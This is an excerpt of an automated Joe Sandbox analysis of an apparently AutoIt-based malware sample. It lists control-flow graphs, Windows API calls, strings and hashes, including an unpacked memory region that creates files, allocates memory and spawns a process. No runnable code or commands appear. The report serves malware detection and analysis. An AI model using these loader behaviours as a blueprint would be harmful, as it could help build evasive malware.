                                                  • Instruction ID: 4dd825b624810db162051562242d63fcb44f7db73c29a94f21779e22a117926f
                                                  • Opcode Fuzzy Hash: 8cb48ec89a9467a6d4382581c445f6698433b535d3bb243e050e3dddf18f1997
                                                  • Instruction Fuzzy Hash: A44132B220450DBBDB146F64EC89BBE36D4EB00B01F140269FB02D72E1CA619E899762

                                                  Control-flow Graph

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                  • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
                                                  • API String ID: 1825951767-3513169116
                                                  • Opcode ID: 10ad7590b94fcc6afdd74649e53dc4a23ded11d3d4ae0798f97d19bbff349464
                                                  • Instruction ID: ba35852d5cbf2d6443f7c856f1d30c24594d6ea27c9c7dadf996259f4f322e2b
                                                  • Opcode Fuzzy Hash: 10ad7590b94fcc6afdd74649e53dc4a23ded11d3d4ae0798f97d19bbff349464
                                                  • Instruction Fuzzy Hash: 3EA15A7290022D9ACF04EBA4DC91AFEB7F8BF15710F4005A9E616B7191EF745A0DCB61

                                                   Control-flow Graph (rendered graph not extracted; its Executed / Not Executed legend refers to block colouring)
                                                   • Basic blocks of 02280920 and their calls, in address order: 02280920 call 02280820, CreateFileW; 0228099B VirtualAlloc; 022809BB CreateFileW; 02280A05 ReadFile; 02280A68 WriteFile; 02280AAA CloseHandle, VirtualFree. The other branch after each call leads to the common exit block at 02280AD4.
                                                  APIs
                                                  • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 02280965
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1301328503.0000000002280000.00000040.00001000.00020000.00000000.sdmp, Offset: 02280000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_2280000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: CreateFile
                                                  • String ID:
                                                  • API String ID: 823142352-0
                                                  • Opcode ID: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                                                  • Instruction ID: 50410712166cd7406cf76cb1cf5f2288b135373cfd31b7131efe66a79351cdc7
                                                  • Opcode Fuzzy Hash: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                                                  • Instruction Fuzzy Hash: C651E976A61209FBEB60DFE4CC49FDE7778AF48701F108554FA19AA1C0DA74A644CB60

                                                  Control-flow Graph

                                                  control_flow_graph 1049 bf39d5-bf3a45 CreateWindowExW * 2 ShowWindow * 2
                                                  APIs
                                                  • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00BF3A03
                                                  • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00BF3A24
                                                  • ShowWindow.USER32(00000000,?,?), ref: 00BF3A38
                                                  • ShowWindow.USER32(00000000,?,?), ref: 00BF3A41
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Window$CreateShow
                                                  • String ID: AutoIt v3$edit
                                                  • API String ID: 1584632944-3779509399
                                                  • Opcode ID: fad5d9fa130d61b71989305f3c150cb840a20610172a448ff6ba024c68aed7fd
                                                  • Instruction ID: e2cc3f16e794300a743a03e00cd6d5d1f2665bc626cb12c44f64f3af2ea082bb
                                                  • Opcode Fuzzy Hash: fad5d9fa130d61b71989305f3c150cb840a20610172a448ff6ba024c68aed7fd
                                                  • Instruction Fuzzy Hash: 3BF0DA755426907EEA3157276C49F6F3E7DD7C6F50F01422EB904A2270C6611851DAB1

                                                  Control-flow Graph

                                                  control_flow_graph 1050 bf407c-bf4092 1051 bf416f-bf4173 1050->1051 1052 bf4098-bf40ad call bf7a16 1050->1052 1055 c2d3c8-c2d3d7 LoadStringW 1052->1055 1056 bf40b3-bf40d3 call bf7bcc 1052->1056 1058 c2d3e2-c2d3fa call bf7b2e call bf6fe3 1055->1058 1056->1058 1061 bf40d9-bf40dd 1056->1061 1068 bf40ed-bf416a call c12de0 call bf454e call c12dbc Shell_NotifyIconW call bf5904 1058->1068 1072 c2d400-c2d41e call bf7cab call bf6fe3 call bf7cab 1058->1072 1062 bf4174-bf417d call bf8047 1061->1062 1063 bf40e3-bf40e8 call bf7b2e 1061->1063 1062->1068 1063->1068 1068->1051 1072->1068
                                                  APIs
                                                  • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00C2D3D7
                                                    • Part of subcall function 00BF7BCC: _memmove.LIBCMT ref: 00BF7C06
                                                  • _memset.LIBCMT ref: 00BF40FC
                                                  • _wcscpy.LIBCMT ref: 00BF4150
                                                  • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00BF4160
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                  • String ID: Line:
                                                  • API String ID: 3942752672-1585850449
                                                  • Opcode ID: 79180e11c8e8f6c87853bc9b55a02295feb80c652b878053ee2dff8d984a02f8
                                                  • Instruction ID: c4fa5c76fc72e55736f85dbf8693a035cea9112afbf504e2bbb6c68fec63002f
                                                  • Opcode Fuzzy Hash: 79180e11c8e8f6c87853bc9b55a02295feb80c652b878053ee2dff8d984a02f8
                                                  • Instruction Fuzzy Hash: CC318D71009709ABD321EB60EC46BEB77E8AF54304F104A9EF685930A1EF70964CCB93

                                                  Control-flow Graph

                                                  control_flow_graph 1085 c1541d-c15436 1086 c15453 1085->1086 1087 c15438-c1543d 1085->1087 1088 c15455-c1545b 1086->1088 1087->1086 1089 c1543f-c15441 1087->1089 1090 c15443-c15448 call c18b28 1089->1090 1091 c1545c-c15461 1089->1091 1103 c1544e call c18db6 1090->1103 1092 c15463-c1546d 1091->1092 1093 c1546f-c15473 1091->1093 1092->1093 1095 c15493-c154a2 1092->1095 1096 c15483-c15485 1093->1096 1097 c15475-c15480 call c12de0 1093->1097 1101 c154a4-c154a7 1095->1101 1102 c154a9 1095->1102 1096->1090 1100 c15487-c15491 1096->1100 1097->1096 1100->1090 1100->1095 1105 c154ae-c154b3 1101->1105 1102->1105 1103->1086 1107 c154b9-c154c0 1105->1107 1108 c1559c-c1559f 1105->1108 1109 c15501-c15503 1107->1109 1110 c154c2-c154ca 1107->1110 1108->1088 1112 c15505-c15507 1109->1112 1113 c1556d-c1556e call c20ba7 1109->1113 1110->1109 1111 c154cc 1110->1111 1114 c154d2-c154d4 1111->1114 1115 c155ca 1111->1115 1116 c15509-c15511 1112->1116 1117 c1552b-c15536 1112->1117 1124 c15573-c15577 1113->1124 1119 c154d6-c154d8 1114->1119 1120 c154db-c154e0 1114->1120 1121 c155ce-c155d7 1115->1121 1122 c15521-c15525 1116->1122 1123 c15513-c1551f 1116->1123 1125 c15538 1117->1125 1126 c1553a-c1553d 1117->1126 1119->1120 1127 c155a4-c155a8 1120->1127 1129 c154e6-c154ff call c20cc8 1120->1129 1121->1088 1130 c15527-c15529 1122->1130 1123->1130 1124->1121 1131 c15579-c1557e 1124->1131 1125->1126 1126->1127 1128 c1553f-c1554b call c146e6 call c20e5b 1126->1128 1132 c155ba-c155c5 call c18b28 1127->1132 1133 c155aa-c155b7 call c12de0 1127->1133 1146 c15550-c15555 1128->1146 1145 c15562-c1556b 1129->1145 1130->1126 1131->1127 1136 c15580-c15591 1131->1136 1132->1103 1133->1132 1141 c15594-c15596 1136->1141 1141->1107 1141->1108 1145->1141 1147 c1555b-c1555e 1146->1147 1148 c155dc-c155e0 1146->1148 1147->1115 1149 c15560 1147->1149 1148->1121 1149->1145
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                  • String ID:
                                                  • API String ID: 1559183368-0
                                                  • Opcode ID: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
                                                  • Instruction ID: 4d2d579a7bc37a0fd32f2fab8fb369515298d16e221f901cf368913b0fe61c59
                                                  • Opcode Fuzzy Hash: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
                                                  • Instruction Fuzzy Hash: EE51A570A00B05DBDB249F69D8806EE77A7AF82321F248729F835962D1D7709ED1BB41

                                                  Control-flow Graph

                                                  control_flow_graph 1150 bf686a-bf6891 call bf4ddd 1153 c2e031-c2e041 call c5955b 1150->1153 1154 bf6897-bf68a5 call bf4ddd 1150->1154 1157 c2e046-c2e048 1153->1157 1154->1153 1159 bf68ab-bf68b1 1154->1159 1160 c2e067-c2e0af call c10db6 1157->1160 1161 c2e04a-c2e04d call bf4e4a 1157->1161 1162 c2e052-c2e061 call c542f8 1159->1162 1163 bf68b7-bf68d9 call bf6a8c 1159->1163 1169 c2e0b1-c2e0bb 1160->1169 1170 c2e0d4 1160->1170 1161->1162 1162->1160 1173 c2e0cf-c2e0d0 1169->1173 1174 c2e0d6-c2e0e9 1170->1174 1175 c2e0d2 1173->1175 1176 c2e0bd-c2e0cc 1173->1176 1177 c2e260-c2e271 call c12d55 call bf4e4a 1174->1177 1178 c2e0ef 1174->1178 1175->1174 1176->1173 1187 c2e273-c2e283 call bf7616 call bf5d9b 1177->1187 1180 c2e0f6-c2e0f9 call bf7480 1178->1180 1184 c2e0fe-c2e120 call bf5db2 call c573e9 1180->1184 1194 c2e122-c2e12f 1184->1194 1195 c2e134-c2e13e call c573d3 1184->1195 1203 c2e288-c2e2b8 call c4f7a1 call c10e2c call c12d55 call bf4e4a 1187->1203 1198 c2e227-c2e237 call bf750f 1194->1198 1201 c2e140-c2e153 1195->1201 1202 c2e158-c2e162 call c573bd 1195->1202 1198->1184 1207 c2e23d-c2e25a call bf735d 1198->1207 1201->1198 1212 c2e176-c2e180 call bf5e2a 1202->1212 1213 c2e164-c2e171 1202->1213 1203->1187 1207->1177 1207->1180 1212->1198 1220 c2e186-c2e19e call c4f73d 1212->1220 1213->1198 1225 c2e1a0-c2e1bf call bf7de1 call bf5904 1220->1225 1226 c2e1c1-c2e1c4 1220->1226 1249 c2e1e2-c2e1f0 call bf5db2 1225->1249 1227 c2e1f2-c2e1f5 1226->1227 1228 c2e1c6-c2e1e1 call bf7de1 call bf6839 call bf5904 1226->1228 1230 c2e1f7-c2e200 call c4f65e 1227->1230 1231 c2e215-c2e218 call c5737f 1227->1231 1228->1249 1230->1203 1242 c2e206-c2e210 call c10e2c 1230->1242 1239 c2e21d-c2e226 call c10e2c 1231->1239 1239->1198 1242->1184 1249->1239
                                                  APIs
                                                    • Part of subcall function 00BF4DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00CB52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00BF4E0F
                                                  • _free.LIBCMT ref: 00C2E263
                                                  • _free.LIBCMT ref: 00C2E2AA
                                                    • Part of subcall function 00BF6A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00BF6BAD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: _free$CurrentDirectoryLibraryLoad
                                                  • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                  • API String ID: 2861923089-1757145024
                                                  • Opcode ID: d0810c5441b92eece7be953dbb31d827b021adf23385c0360275c0cdcf3926ae
                                                  • Instruction ID: e8f232d8970271e90d1627c0d700057b9e76de71d59d1b421bf8c0904360f8bd
                                                  • Opcode Fuzzy Hash: d0810c5441b92eece7be953dbb31d827b021adf23385c0360275c0cdcf3926ae
                                                  • Instruction Fuzzy Hash: B6916E7190022DEFCF14EFA4DC819EDB7B8FF05310B10446AF916AB2A1DB709A59DB50
                                                  APIs
                                                    • Part of subcall function 022822D0: Sleep.KERNELBASE(000001F4), ref: 022822E1
                                                  • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0228251D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1301328503.0000000002280000.00000040.00001000.00020000.00000000.sdmp, Offset: 02280000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_2280000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: CreateFileSleep
                                                  • String ID: K8964UA2SM5T5L
                                                  • API String ID: 2694422964-325841267
                                                  • Opcode ID: 98900f42fa93481124b8abb243843155ebc5cf799ce877e861247058f6467cc2
                                                  • Instruction ID: 4fc7f77648eabbd416ea146c3581f7e696083f7b38d4e61655b9d5ad957c6d3e
                                                  • Opcode Fuzzy Hash: 98900f42fa93481124b8abb243843155ebc5cf799ce877e861247058f6467cc2
                                                  • Instruction Fuzzy Hash: 3F516F30D15248DAEF15EBE4C864BEEB779AF18300F004599E609BB2C0DBB95B45CBA5
                                                  APIs
                                                  • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00BF35A1,SwapMouseButtons,00000004,?), ref: 00BF35D4
                                                  • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00BF35A1,SwapMouseButtons,00000004,?,?,?,?,00BF2754), ref: 00BF35F5
                                                  • RegCloseKey.KERNELBASE(00000000,?,?,00BF35A1,SwapMouseButtons,00000004,?,?,?,?,00BF2754), ref: 00BF3617
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: CloseOpenQueryValue
                                                  • String ID: Control Panel\Mouse
                                                  • API String ID: 3677997916-824357125
                                                  • Opcode ID: d8eec4674789ae6ee0c518b2b0cac56b44438b1ea69e44edea5c491ffdf788cc
                                                  • Instruction ID: ce563c370cf8aa99b0db6c030a9042b049ab45932b2a11570422663e21fb88d3
                                                  • Opcode Fuzzy Hash: d8eec4674789ae6ee0c518b2b0cac56b44438b1ea69e44edea5c491ffdf788cc
                                                  • Instruction Fuzzy Hash: 5711457161420CBFDF208F64DC80ABEBBF8EF04B40F0084A9E909D7210E2719E499BA0
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                  • String ID:
                                                  • API String ID: 2782032738-0
                                                  • Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                  • Instruction ID: 862c005e6dd0d4c89fa5ca20690ae86d3492284a26dd8062f5c4adeb03e3c83c
                                                  • Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                  • Instruction Fuzzy Hash: 16419475A007459BEB1CCE69C8809EA77A6AF47364B24853DE825C76C0DB70DEC1EB90
                                                  APIs
                                                  • _memset.LIBCMT ref: 00C2EA39
                                                  • GetOpenFileNameW.COMDLG32(?), ref: 00C2EA83
                                                    • Part of subcall function 00BF4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00BF4743,?,?,00BF37AE,?), ref: 00BF4770
                                                    • Part of subcall function 00C10791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00C107B0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Name$Path$FileFullLongOpen_memset
                                                  • String ID: X
                                                  • API String ID: 3777226403-3081909835
                                                  • Opcode ID: 856d6ae5d9a376aa8adeb647b0da2b4ad736417ba7307f101b30c962a8486d6b
                                                  • Instruction ID: 9534d2d641aea2eb407d3f9b006c25aefa4363adb70d1c95fafcc24bf3635a17
                                                  • Opcode Fuzzy Hash: 856d6ae5d9a376aa8adeb647b0da2b4ad736417ba7307f101b30c962a8486d6b
                                                  • Instruction Fuzzy Hash: ED219071A0025C9BDF41DF94D845BEEBBF8AF4A714F00409AE908BB241DFB4598D9FA1
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: __fread_nolock_memmove
                                                  • String ID: EA06
                                                  • API String ID: 1988441806-3962188686
                                                  • Opcode ID: 55c20aa7c37b120d95f0c3ec78349156fac5c41adbdc0739dc0e8fb42e7e34f9
                                                  • Instruction ID: 60871e97a44351591f5ffb621b1bf86463462f910ab84792c29fe1e658914313
                                                  • Opcode Fuzzy Hash: 55c20aa7c37b120d95f0c3ec78349156fac5c41adbdc0739dc0e8fb42e7e34f9
                                                  • Instruction Fuzzy Hash: 1B01F9719042187EDB18CAA8C816EEEBBF8DB11301F00419AF592D2181E875A6489BA0
                                                  APIs
                                                  • CreateProcessW.KERNELBASE(?,00000000), ref: 02281045
                                                  • ExitProcess.KERNEL32(00000000), ref: 02281064
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1301328503.0000000002280000.00000040.00001000.00020000.00000000.sdmp, Offset: 02280000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_2280000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Process$CreateExit
                                                  • String ID: D
                                                  • API String ID: 126409537-2746444292
                                                  • Opcode ID: 8ff53cc741f04adc946779470c72492426263afa614c789403871e93d35377f7
                                                  • Instruction ID: a10d8b89f04e39bacf3cb5120f577440f18644e016f6ecc278f31f717e86f553
                                                  • Opcode Fuzzy Hash: 8ff53cc741f04adc946779470c72492426263afa614c789403871e93d35377f7
                                                  • Instruction Fuzzy Hash: 75F0ECB195125CABDB60EFE0CC49FEE777CBF04701F008908FE0A9A184DA78D6088B61
                                                  APIs
                                                  • GetTempPathW.KERNEL32(00000104,?), ref: 00C598F8
                                                  • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00C5990F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Temp$FileNamePath
                                                  • String ID: aut
                                                  • API String ID: 3285503233-3010740371
                                                  • Opcode ID: 9f65e65a531008bd38f62ec89a19a1eee8176d48cef6096eb70965917ba9c5c5
                                                  • Instruction ID: d582fd87f5b73d39a2754c0f20bbb067fff45dd84db2478066e844af5c87d3b3
                                                  • Opcode Fuzzy Hash: 9f65e65a531008bd38f62ec89a19a1eee8176d48cef6096eb70965917ba9c5c5
                                                  • Instruction Fuzzy Hash: 01D05E7954030DABDB509BA0DC4EFAA773CE704704F0002B1BA98920A2EEB099998B91
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: cf08768ed1a5004f7278287a3a4da3006bf777865612645dafb124c25865b7d4
                                                  • Instruction ID: cce7e022a784b0c60e189ed72fdace40017cd939c863073b8bd425be2657e4b3
                                                  • Opcode Fuzzy Hash: cf08768ed1a5004f7278287a3a4da3006bf777865612645dafb124c25865b7d4
                                                  • Instruction Fuzzy Hash: 74F148706083049FCB24DF28C484A6ABBE5FF88314F14896EF9A99B251D731E945CF82
                                                  APIs
                                                    • Part of subcall function 00C10162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00C10193
                                                    • Part of subcall function 00C10162: MapVirtualKeyW.USER32(00000010,00000000), ref: 00C1019B
                                                    • Part of subcall function 00C10162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00C101A6
                                                    • Part of subcall function 00C10162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00C101B1
                                                    • Part of subcall function 00C10162: MapVirtualKeyW.USER32(00000011,00000000), ref: 00C101B9
                                                    • Part of subcall function 00C10162: MapVirtualKeyW.USER32(00000012,00000000), ref: 00C101C1
                                                    • Part of subcall function 00C060F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00BFF930), ref: 00C06154
                                                  • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00BFF9CD
                                                  • OleInitialize.OLE32(00000000), ref: 00BFFA4A
                                                  • CloseHandle.KERNEL32(00000000), ref: 00C345C8
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                  • String ID:
                                                  • API String ID: 1986988660-0
                                                  • Opcode ID: 40a8ceac0f22b1a21b6e089d9f7c729e8ef1665c6ce72eee095c18a8037fd4dc
